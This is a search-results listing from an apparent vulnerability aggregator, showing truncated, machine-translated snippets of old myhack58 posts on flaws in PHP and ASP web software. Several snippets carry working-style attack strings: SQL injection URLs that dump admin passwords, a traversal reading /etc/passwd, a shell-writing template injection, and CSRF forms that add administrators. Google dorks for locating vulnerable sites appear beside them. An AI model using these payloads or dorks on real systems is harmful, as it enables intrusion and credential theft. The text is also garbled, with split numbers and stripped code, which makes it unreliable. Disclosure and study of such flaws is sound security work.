Lucene search
K
Myhack58Most viewed

7620 matches found

myhack58
myhack58
added 2012/10/22 12:0 a.m.18 views

phpMyAdmin 3.5. x HTML injection vulnerability-vulnerability warning-the black bar safety net

Vulnerability version: phpMyAdmin 3.5. x Vulnerability description: Bugtraq ID:5 5 9 2 5 CVE ID:CVE-2 0 1 2-5 3 3 9 phpMyAdmin is a PHP-based MySQL management program. phpMyAdmin Trigger, Procedure and Event pages not correctly escape HTML output, use the special name creating/modifying a trigger...

0.2AI score
Exploits0
myhack58
myhack58
added 2012/10/20 12:0 a.m.18 views

phpstat system to read arbitrary files vulnerability-vulnerability warning-the black bar safety net

Author: Cond0r From the toast Forum ./ count/count.com.php $website = $GETwebsite; $image = $GETimage; //determine the image if!$ image $imagesrc = "../templates/". TPLNAME."/". TPLIMGDIR."/ icos/countlogo1.gif"; else $imagesrc = "../templates/". TPLNAME."/". TPLIMGDIR."/ icos/".$ image; //send a...

0.5AI score
Exploits0
myhack58
myhack58
added 2012/10/18 12:0 a.m.18 views

Explosion a metinfo m extension background to modify any user password vulnerability-vulnerability warning-the black bar safety net

The last explosion of the metinfo a lot of loopholes, the official action soon, in the afternoon on the upgrade, which front Desk to modify any user password, and later found that a background can also, the front surface of the same, with the official said, Now upgraded to 5. 0. 4 is not yet...

1.3AI score
Exploits0
myhack58
myhack58
added 2012/09/25 12:0 a.m.18 views

AKCMS is injected and the background holding shell vulnerability-vulnerability warning-the black bar safety net

! ! The template is written the following: fputsfopen“./ 0x80c.php”,”w”,”” Then ! The administrator password can be injected to obtain http://www.myhack58.com/akcmskeyword.php?sid=11111%27and%28select%201%20from%28select%20count%28%2 9,concat%2 8%28select%2 0%28select%2...

7.3AI score
Exploits0
myhack58
myhack58
added 2012/09/25 12:0 a.m.18 views

DedeEIMS v1. 1 storm background path-vulnerability warning-the black bar safety net

includedialogconfig.php //Test user login status $cuserLogin = new 'userLogin' ; if$cuserLogin-getUserID==-1 if$cuserLogin-adminDir==" exit'Request Error!'; $gurl = "../../$cuserLogin-adminDir/login. php? gotopage=". urlencode$dedeNowurl; echo ""; exit; http://www.xxx.com/include/dialog/config.ph...

7.2AI score
Exploits0
myhack58
myhack58
added 2012/09/08 12:0 a.m.18 views

SinaEditor secondary development JSP version upload vulnerability in the simple analysis-vulnerability warning-the black bar safety net

0×0 0 SinaEditor description 0×0 1 vulnerability description 0×0 2 exploits 0×0 3 vulnerability analysis 0×0 4 bug fixes Author:itleaf Note:I beginners,analysis wrong also please correct me 0×0 0 SinaEditor description SinaEditor is based on the Sina blog editor Open Source Editor. You can use it...

0.1AI score
Exploits0
myhack58
myhack58
added 2012/07/30 12:0 a.m.18 views

WordPress Front End Upload v0. 5. 4. 4 arbitrary php file upload-vulnerability warning-the black bar safety net

Title: WordPress Front End Upload v0. 5. 4. 4 Arbitrary PHP File Upload Vulnerability Author: Chris Kellum Home page: http://mondaybynoon.com/ Software address: http://downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip Affected version: 0.5.4.4 Defect analysis ===================== Plugi...

0.2AI score
Exploits0
myhack58
myhack58
added 2012/07/13 12:0 a.m.18 views

The zend framework xxe injection analysis-vulnerability warning-the black bar safety net

A few days ago online broke a zend framework vulnerability author: mkods Specifically described as follows: ; according to the description, the vulnerability occurs in the zend Framework xmlrpc module of an xxeXML external entity injection vulnerability this vulnerability can be read on server...

0.8AI score
Exploits0
myhack58
myhack58
added 2012/07/03 12:0 a.m.18 views

WordPress information leakage and illegal operation vulnerability-vulnerability warning-the black bar safety net

Affected system: WordPress WordPress 3. x Description: -------------------------------------------------------------------------------- WordPress is a PHP language and MySQL database development Blog(blog, blogengine, users can support PHP and MySQL database server on build your own Blog...

7AI score
Exploits0
myhack58
myhack58
added 2012/06/28 12:0 a.m.18 views

A hotel management system vulnerability analysis-vulnerability warning-the black bar safety net

1:injection review: http://www.xxx.com /Company. asp? id=1 Table name:Nwebadmin,direct al D can be added, the ID=trimrequest. QueryString"id" //directly pass the value of ID,but the filter only has 2 sides of space if ID="" then ID=1 //judge the statement, whatever it set Rs = server...

1.5AI score
Exploits0
myhack58
myhack58
added 2012/06/25 12:0 a.m.18 views

Cannes the company registered the class website system cookie injection vulnerability-vulnerability warning-the black bar safety net

Cannes the company registered the class website system v9. 6 cookies injection transit http://www.xxxx.com /jmcook. asp? jmdcw=1 7+and 1=2 union select 1,2,password,4,5,password,7,8,9,1 0,1 1,1 2,1 3 from admin Background get the shell cookies name kid can upload ewe modify the style Database...

1AI score
Exploits0
myhack58
myhack58
added 2012/06/20 12:0 a.m.18 views

PHP Decoda 3.3.1 local file containing the defect and repair-vulnerability warning-the black bar safety net

Title: php-decoda local file inclusion Author: Number 7 Software address: http://milesj.me/code/php/decoda Affected versions: 3.3.1 Test platform: linux Proof: http://www.xxxx.com/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00 Line 1 1 1 in Index.php: ? php include $view .'...

1AI score
Exploits0
myhack58
myhack58
added 2012/06/05 12:0 a.m.18 views

shopxp online shopping system v7. 4 SQL injection vulnerability-vulnerability warning-the black bar safety net

Keywords: inurl:shopxpnews. asp Injected code: TEXTBOX2. ASP? action=modify&news%69d=1 2 2%20and%2 0 1=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxpadmin Broke the user name and password note: username and password are connected together, after the sixth bit is the password MD...

1.2AI score
Exploits0
myhack58
myhack58
added 2012/05/29 12:0 a.m.18 views

Network fun website management system V2. 1 The official version of 0day-vulnerability warning-the black bar safety net

Author: Samy source: bug 1. asp : % Response. Cookies"KuUSER""UserName"="" userid=request. querystring"userid" % % set rsmsg=server. createobject"adodb. recordset" sqlmsg="select from Comuser where comid="&userid&"" rem get the data without the filter rsmsg. open sqlmsg,conn,1,3 if rsmsg. eof and...

0.2AI score
Exploits0
myhack58
myhack58
added 2012/05/19 12:0 a.m.18 views

Artiphp CMS 5.5.0 database backup disclosure Exploit-vulnerability warning-the black bar safety net

? php / Artiphp CMS 5.5.0 Database Backup Disclosure Exploit Author: Artiphp www.2cto.com http://www.artiphp.com Affected version: 5.5.0 Neo r422 Summary: Artiphp is a content management system CMS open and free to create and manage your website. Description: Artiphp stores database backups using...

Exploits0
myhack58
myhack58
added 2012/03/10 12:0 a.m.18 views

Struts2 and Webwork remote command execution vulnerability analysis-vulnerability warning-the black bar safety net

The vulnerability discovered by the publisher of the POC, and can not affect the xwork 2.1.2 prior to some versionthis version before some of the versions below will be collectively referred to as the old version, then called the new version, such as struts 2.0.14that is, the struts patch A N...

7.3AI score
Exploits0
myhack58
myhack58
added 2012/02/21 12:0 a.m.18 views

almnzm 2.4 <= CSRF flaws (add administrator)and fix-vulnerability warning-the black bar safety net

Developer: almnzm.com Author: HaNniBaL KsA HK [email protected] CSRF testadd a new administrator : centerbfont face="Tahoma" size="5" font color="FF0000"Priv8/font span dir="ltr"font color="FF0000"Almnzm 2.4/fontfont color="ffffff" /font/span CSRF Exploit!! /fontfont face="Tahoma" size="2"/fontfont...

0.1AI score
Exploits0
myhack58
myhack58
added 2012/02/13 12:0 a.m.18 views

ECShop v2. 7. 2 wap page storm path 0day-vulnerability warning-the black bar safety net

Google: inurl:mobile/goods. php? act=viewimg&id=1 2 3 Search to After in page plus&id=5 That is, http://www. badguest. cn/mobile/goods. php? act=viewimg&id=1 2 3&id=5 For example, for many forums, submitted a non-existent file request, or submit a There is no output file of the request, the serve...

6.9AI score
Exploits0
myhack58
myhack58
added 2012/02/09 12:0 a.m.18 views

Postal savings banks the UKEY useless-vulnerability warning-the black bar safety net

Today to the postal Savings Bank postal savings bank of china to go to the opening of the postal green card through the online banking, in order to safeguard the Bank account of the funding security, the requirements for online banking opened UKEY protection, the Bank staff attitude good, and...

7.4AI score
Exploits0
myhack58
myhack58
added 2012/01/20 12:0 a.m.18 views

PhpBridges Blog System members.php SQL injection and fix-vulnerability warning-the black bar safety net

Title: PhpBridges Blog System SQL Injection Vulnerability Author: 3spi0n Program website: https://launchpad.net/phpbridges Test platform: BackTrack 5 - Win7 Ultimate Development language: Php $The defect file: members.php $ Test site: www.badguest.cn /members. php? id=2" SQL Injection Dar bi...

Exploits0
myhack58
myhack58
added 2011/12/23 12:0 a.m.18 views

Plone zope remote command execution vulnerability(python)-bug warning-the black bar safety net

Versions Affected without hotfix: Plone 4.0 through 4.0.9; Plone 4.1; Plone 4.2 a1 and a2; Zope 2.12. x and Zope 2.13. x. Versions Not Affected: Versions of Plone that use Zope other than Zope 2.12. x and Zope 2.13. x. Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928...

1.8AI score
Exploits0
myhack58
myhack58
added 2011/11/23 12:0 a.m.18 views

2taoke2. 2 injection flaws and fixes-vulnerability warning-the black bar safety net

Team:t00ls Author: Cond0r if$REQUEST ifgetmagicquotesgpc $REQUEST = taostrip$REQUEST; else $POST = taocheck$POST; $GET = taocheck$GET; @extract$POST; @extract$GET; $REQUEST=filterxss$REQUEST, ALLOWEDHTMLTAGS; @extract$REQUEST; Just do a simple simple filtration Vulnerability file shops.php $cid =...

2AI score
Exploits0
myhack58
myhack58
added 2011/10/24 12:0 a.m.18 views

ecshop 4 8 leak site path vulnerability-vulnerability warning-the black bar safety net

http:// 网站 /shop/api/cron.php http:// 网站 /shop/wap/goods.php http:// 网站 /shop/temp/compiled/urhere.lbi.php http:// 网站 /shop/temp/compiled/pages.lbi.php http:// 网站 /shop/temp/compiled/usertransaction.dwt.php http:// 网站 /shop/temp/compiled/history.lbi.php http:// 网站...

7.3AI score
Exploits0
myhack58
myhack58
added 2011/10/20 12:0 a.m.18 views

Furniture flooring group website the entire Station v1. 0 cookie injection vulnerability-vulnerability warning-the black bar safety net

Source code description: All-round corporate website system-the group of beautiful atmospheric versionDouble version simplified and traditional, the latest optimization background and the keyword version, the anti - SQL injection. Administrator address:../admin/adminlogin. asp Administrator...

0.2AI score
Exploits0
myhack58
myhack58
added 2011/10/20 12:0 a.m.18 views

WHMCompleteSolution (cart.php)local file disclosure flaws and fixes-vulnerability warning-the black bar safety net

Title: WHMCompleteSolution cart.php Local File Disclosure Author: Lagripe-Dz www.badguest.cn Developer: WHMCS WHMCompleteSolution http://whmcs.com/ Affected version: 3. x. x , 4.0. x Test platform: linux+apache Defect file: cart.php --------- Code analysis: --------- if $a == "add" $templatefile...

0.2AI score
Exploits0
myhack58
myhack58
added 2011/10/14 12:0 a.m.18 views

shopex password retrieve at the newly generated password may predict vulnerability-vulnerability warning-the black bar safety net

Brief description: shopex in the password place, there are some logic design problems, the cause can be predicted the newly-generated password may be used to attack acquiring others passwords Detailed description: The relevant code /core/shop/controller/ctl. passport. php: function sendPSW...

0.4AI score
Exploits0
myhack58
myhack58
added 2011/10/14 12:0 a.m.18 views

Wind noise dotNETCMS 0day-vulnerability warning-the black bar safety net

Brief description: File upload Detailed description: Vulnerability in the user page, the registered user. Article management, upload of.. Select the file name unchanged.... Upload 1. asp;,jpg And then you know Vulnerability to prove: ! ! !...

1.5AI score
Exploits0
myhack58
myhack58
added 2011/10/06 12:0 a.m.18 views

Easy Hosting control panel to manage authentication bypass the defect and repair-vulnerability warning-the black bar safety net

Title: Easy Hosting Control Panel Admin Auth Bypass Author: Jasman www.2cto.com Download address: https://launchpad.net/ehcp & amp; http://www.ehcp.net Affected version: 0.29.10 - 0.29.13 Test platform: Ubuntu, Debian Overview Easy Hosting Control Panel designed for hosting of multiple domains on...

0.5AI score
Exploits0
myhack58
myhack58
added 2011/08/31 12:0 a.m.18 views

Enterprise to food industry website source code 1.0 injection vulnerabilities and fixes-vulnerability warning-the black bar safety net

by Mr. DzY from www.0855.tv This system seems to be in the 0 to 5 year development. Is not the original work, to research it! The modified switch. Source code download: Demo address: Default backend: system/index. asp EXP: the union select 1,2,3,username,password,6,7,8,9,1 0,1 1,1 2 from nwebadmi...

7.3AI score
Exploits0
myhack58
myhack58
added 2011/08/06 12:0 a.m.18 views

Taoyuan Network Hard Drive&IIS6. 0 parsing vulnerability and the Fix-vulnerability warning-the black bar safety net

IIS6. 0 filename parsing vulnerability, as long as the use IIS6. 0 of Taoyuan Network Hard Drive to upload a php Trojan:1 2 3;asp;123.jpg that Then through the show. aspx? type=1&filepath=http://www. badguest. cn/the method takes a file path, The last to perform, you can. Repair: frequently asked...

1.8AI score
Exploits0
myhack58
myhack58
added 2011/07/29 12:0 a.m.18 views

iGiveTest 2.1.0 injection vulnerability-vulnerability warning-the black bar safety net

Version: = 2.1.0 Homepage: http://iGiveTest.com/ Google keywords: “Powered by iGiveTest” Just register for an account. And then the storm of the administrator account and password http://www.xxxx.com/users.php?action=groups&order=-1&the userids=-1 union select...

3.2AI score
Exploits0
myhack58
myhack58
added 2011/07/23 12:0 a.m.18 views

evin Basic PHP Events Lister v2. 0 3 CSRF flaws and fixes-vulnerability warning-the black bar safety net

Author: CrazyHacker Script: Mevin Basic PHP Events Lister v2. 0 3 Exploit type: CSRF Vulnerability Add & Delete Admin Download: php-events-lister2.03.zip"http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip Risk: High Contact: [email protected] form name="setup" action="...

7.3AI score
Exploits0
myhack58
myhack58
added 2011/07/12 12:0 a.m.18 views

EC_word enterprise management system injection exploit-vulnerability warning-the black bar safety net

The program uses maple General-purpose anti injection 1. 0 asp Edition, this anti-injection completely tasteless, the site program proshow. asp with cookies to injection, or variant of the injection, before injection can first determine what number of fields: ORdeR By xx Injected statement: ANd 1...

0.9AI score
Exploits0
myhack58
myhack58
added 2011/07/05 12:0 a.m.18 views

VietNext cms multiple defects and repair-vulnerability warning-the black bar safety net

Exploit Title:Multiple Vulnerabilities + Date: 2 0 1 1 + script:VietNext cms + Software: http://vietnextco.com & amp; http://vietnext.vn + Author : pentesters. ir + Website : WwW.PenTesters.IR + dorks :"Developed & Design By VietNext" and "Design by VietNext"...

7.4AI score
Exploits0
myhack58
myhack58
added 2011/06/13 12:0 a.m.18 views

eFront add administrator CSRF vulnerability-vulnerability warning-the black bar safety net

Vulnerability description: eFront is a tool for small and medium businesses, schools, government provide a PHP content management system, due to design defect, causing the remote to add the management, modification Management, Configuration, etc. multiple cross-site request forgery...

7.1AI score
Exploits0
myhack58
myhack58
added 2011/06/12 12:0 a.m.18 views

Pacer Edition CMS 2.1 (l param)local file inclusion flaw and fix-vulnerability warning-the black bar safety net

Pacer Edition CMS 2.1 l param Local File Inclusion Vulnerability Vendor: The Pacer Edition Product web page: http://www.thepaceredition.com Affected version: RC 2.1 SVN: 8 6 7 Summary: The 'Pacer Edition' is a Content Management SystemCMS written using PHP 5.2.9 as a minimum requirement. The Pace...

6.9AI score
Exploits0
myhack58
myhack58
added 2011/05/31 12:0 a.m.18 views

Upload file to cause arbitrary code execution-vulnerability warning-the black bar safety net

Foxmail Server is designed for people design mail server software,offering a variety of mail services, the user can use Foxmail, Outlook and other client software to send and receive messages, also can be in a beautiful and easy to use Chinese language on the Web interface login processing mail...

1.3AI score
Exploits0
myhack58
myhack58
added 2011/05/21 12:0 a.m.18 views

Good subtle Bo then burst IIS parsing upload vulnerability and fix-vulnerability warning-the black bar safety net

By: the joken's, wdlei Recently, webmasters Download Station on a good subtle Bo program and update. Update Time 2 0 1 0 year 7 month 1 3 day, update the skin and modify the upload vulnerabilities, but still exist vulnerability issues. Vulnerability file: UpFileForm. asp Code: html head meta...

7.3AI score
Exploits0
myhack58
myhack58
added 2011/05/17 12:0 a.m.18 views

Scarecrow enterprise Station management system wide byte injection exploit-vulnerability warning-the black bar safety net

Scarecrow enterprise Station based on php+sqlite and php+mysql two versions, php+sqlite features and asp+access almost,the advantage is in favor of the backup, now mostly web space to support php+sqlite. php+mysql features is conducive to processing large amounts of data, but backup and restore i...

0.4AI score
Exploits0
myhack58
myhack58
added 2011/04/18 12:0 a.m.18 views

pub918 software company website system 1. 3 the presence of multi-vulnerability-vulnerability warning-the black bar safety net

pub918 software company site system is a great-looking corporate type website Background Username Password admin Download: http://www.mycodes.net/25/4040.htm Background: admin/ Default database: admin/db/N%2 3%23ews. mdb 1, The ewebeditor problem. Path:...

1.2AI score
Exploits0
myhack58
myhack58
added 2011/04/03 12:0 a.m.18 views

Real player 14.0.2.633 0day Buffer overflow/DOS Exploit-vulnerability warning-the black bar safety net

Real player 14.0.2.633 0day Buffer overflow/DOS Exploit Great。。。。。 real player...... 0day...... !/ usr/bin/perl +Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit +Software Link: www.soft32.com/download122615.html +Software: Real player +Version: 14.0.2.633 +Tested On: WIN-XP SP3 ...

0.7AI score
Exploits0
myhack58
myhack58
added 2011/03/31 12:0 a.m.18 views

Joe guest(joekoe) CMS 4.0 upload and SQL injection vulnerabilities-vulnerability warning-the black bar safety net

Joekoe CMS 4.0 brings you a perfect design, in the member interaction and Security aspects of a unique innovative system for the Windows NT Service environment of a Web site or a business platform of the best solutions. Its well-designed architecture with functional mechanisms, from the individua...

Exploits0
myhack58
myhack58
added 2011/03/10 12:0 a.m.18 views

boblog arbitrary variable overwrite vulnerability(a)-vulnerability warning-the black bar safety net

by Ryatpuretot mail: puretot at gmail dot com team: http://www.80vul.com Vulnerability code is as follows: // go.php $qurl=$SERVER"REQUESTURI"; @list$relativePath, $rawURL=@explode'/go.php/', $qurl; $rewritedURL=$rawURL; // from$SERVER"REQUESTURI",can be arbitrarily submitted:...

0.9AI score
Exploits0
myhack58
myhack58
added 2011/03/01 12:0 a.m.19 views

dedecms latest vulnerability-vulnerability warning-the black bar safety net

Say the following using the method: registered members, upload software: the local address is filled into a/dede:linkdede:toby57 name="'=0;phpinfo;//"x/dede:toby57, published after the review or modification can be performed. Generated by parsing the file content is as follows: ! After the succes...

2.2AI score
Exploits0
myhack58
myhack58
added 2011/01/29 12:0 a.m.18 views

dircms XSS vulnerability and the use of the method and fix-vulnerability warning-the black bar safety net

| XSSvulnerabilityfile: The online submission function Because of this you do not need to register Membership then the draft before a lot of stations to prohibit registered members Classic white look at the code 1 $info'content'=addalt$info'content',$info'title'; //////////////////////automatical...

0.5AI score
Exploits0
myhack58
myhack58
added 2011/01/18 12:0 a.m.18 views

ESPCMS 0day vulnerability analysis-vulnerability warning-the black bar safety net

Publishing author:★black kid★ Affected versions: unknown Official website: http://www.ecisp.cn Vulnerability type: COOKIES cheat Vulnerability description: made of COOKIES after the Modify to deceive, into the background upload in jpg structure Getshell it. Code analysis: function...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/12/31 12:0 a.m.18 views

WordPress blog personal publishing platform 0DAY-vulnerability warning-the black bar safety net

Framework of the preceding article was not allowed to tell me more about some interesting unpublished vulnerabilities and banal omissions WordPressSo now you'll be able to read the continuation of the penetration-testing of the famous blogging platformHere we go! Statistics To begin, I want to ci...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/10/10 12:0 a.m.18 views

Network fun online shopping system fashion version 1 0. 3 injection vulnerability-vulnerability warning-the black bar safety net

Network fun online shopping system fashion version 1 0. 3 in the member login to edit an order at the presence ofSQL injection, to cause the administrator password is injected into the storm of the MD5 vulnerability. Vulnerability:file editorderform. asp, the presence ofsql injectionvulnerability...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/10/10 12:0 a.m.18 views

Feindura File Manager 1.0 remote upload vulnerability-vulnerability warning-the black bar safety net

Feindura file management system V1. 0 Upload only to verify the file header, resulting in the CAN by the file header spoofing bypasses the upload of any file. Test use: upload shell file the first row is added GIF81a http://www.chinasg.tk/path/library/thirdparty/filemanager/...

1.3AI score
Exploits0
myhack58
myhack58
added 2010/10/04 12:0 a.m.18 views

ecshop modify any user password vulnerability XSS exploit-vulnerability warning-the black bar safety net

Currently ecshop presence of the reflection typeXSS, you can use, if the secondary development existXSSor other CSRF problem, then use more. Once encountered this problem, slightly affected by its damage) ByXSSstructure post submission of personal information is modified, the modification is...

0.1AI score
Exploits0
Total number of security vulnerabilities5000